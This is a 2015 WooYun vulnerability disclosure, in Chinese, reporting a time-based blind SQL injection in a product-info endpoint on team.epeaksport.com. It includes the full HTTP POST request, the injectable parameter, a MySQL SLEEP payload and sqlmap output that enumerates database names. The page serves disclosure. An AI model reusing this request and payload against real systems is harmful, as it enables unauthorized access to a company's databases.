当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125972

漏洞标题:匹克某分站SQL注入漏洞(17库)

相关厂商:epeaksport.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-10 18:11

修复时间:2015-07-15 18:12

公开时间:2015-07-15 18:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

欢迎新厂商入驻乌云

详细说明:

post数据包:

POST /XP001-ProductInfo/dataStorage.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://team.epeaksport.com/
Cookie: PHPSESSID=i532srvsrtg0ml6ui0icdfegc4
Host: team.epeaksport.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
property%5B0%5D%5Bcode%5D=22K9&property%5B0%5D%5Bstate%5D=1&storageSort=0&theCode=E42638H


参数 thecode 可注入

0.png


这个点 跑数据实在是太慢了 就没继续了

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection points with a total of 108 HTTP(s) req
uests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: property[0][code]=22K9&property[0][state]=1&storageSort=0&theCode=E
42638H' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))RKdi)-- lVIE21=6 AND '000Q6sa
'='000Q6sa
---
[18:02:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[18:02:43] [INFO] fetching database names
[18:02:43] [INFO] fetching number of databases
[18:02:43] [INFO] retrieved:
[18:02:43] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[18:03:05] [INFO] adjusting time delay to 1 second due to good response times
7
[18:03:05] [INFO] retrieved: informa
[18:03:53] [ERROR] invalid character detected. retrying..
[18:03:53] [WARNING] increasing time delay to 2 seconds
[18:03:56] [ERROR] invalid character detected. retrying..
[18:03:56] [WARNING] increasing time delay to 3 seconds
[18:04:01] [ERROR] invalid character detected. retrying..
[18:04:01] [WARNING] increasing time delay to 4 seconds
[18:04:09] [ERROR] invalid character detected. retrying..
[18:04:09] [WARNING] increasing time delay to 5 seconds
[18:04:15] [ERROR] invalid character detected. retrying..
[18:04:15] [WARNING] increasing time delay to 6 seconds
[18:04:22] [ERROR] unable to properly validate last character value ('\?81')..
\?81ion
[18:04:47] [ERROR] invalid character detected. retrying..
[18:04:47] [WARNING] increasing time delay to 2 seconds
_schema
[18:05:47] [INFO] retrieved: e
[18:06:07] [ERROR] invalid character detected. retrying..
[18:06:07] [WARNING] increasing time delay to 3 seconds
p
[18:07:06] [ERROR] invalid character detected. retrying..
[18:07:06] [WARNING] increasing time delay to 4 seconds
eak
[18:07:49] [INFO] retrieved:

漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-15 18:12

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无